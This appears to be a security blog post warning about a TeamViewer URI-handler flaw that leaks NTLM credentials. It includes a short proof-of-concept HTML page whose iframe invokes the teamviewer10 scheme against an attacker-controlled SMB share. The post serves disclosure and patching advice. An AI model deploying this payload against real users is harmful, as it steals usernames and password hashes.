Hey Everyone,
Its getting usual these days with a vulnerability in any one of Remote Desktop Applications. This time TeamViewer it is.
A warning sign to the TeamViewer users out there, Be safe out there you guys are not safe anymore with the severe vulnerability in it.
Wondering what is Teamviewer? –> A popular Remote Desktop application that allows you to share screen and take over controls with concern to perform specific actions from anywhere in the world.
TeamViewer is available for Desktop and mobile operating systems such as Windows, MacOS, Linux, Chrome OS, iOS, Android and Blackberry.
Think about it, what if a guy takes over your PC without your concern, that’s something to worry about right?
Security Engineer Jeffrey Hofmann of praetorian, has reported High-risk Vulnerability resides in Custom Handlers, which leads an attacker to force the application to relay an NTLM authentication request to the Hacker’s system.
Attacker doesn’t need much effort to get interacted with Victim’s machine, just need to convince them to visit a malicious web page once. The malicious threat actors could steal your system password and eventually compromise it.
Attacker can gain a remote connection by tricking with the web-page to trick the application with TeamViewer”s URI scheme.
The code Looks like this:
<html lang=”en”>
<head>
<meta charset=”utf-8″>
<meta name=”description” content=”Cat Images”>
<meta name=”author” content=”hacker”>
<link rel=”stylesheet” href=”css/styles.css”>
</head>
<body>
<iframe src=’teamviewer10: –play \attacker-IPsharefake.tvs’></iframe>
</body>
</html>
By visiting the Malicious Web page of attacker’s, it induces the SMB authentication attack and leaks the system username, and NTLMv2 hashed passwords to attacker. So he can use to authenticate himself/herself.
The above mentioned vulnerability is categorized as ‘Unquoted URI Handler’ that affects the following list URI handlers teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1,” Hofmann said.
It’s not being Exploited in wild as of now, but it may happen in future. So it is highly recommended to upgrade their software to 15.8.3.
Similar issue was found in Zoom Video Conferencing application too.
Hope everyone upgrade to latest version and stay safe and secure
Thank you.
Author: Sam Nivethan V J
Security Analyst & Trainer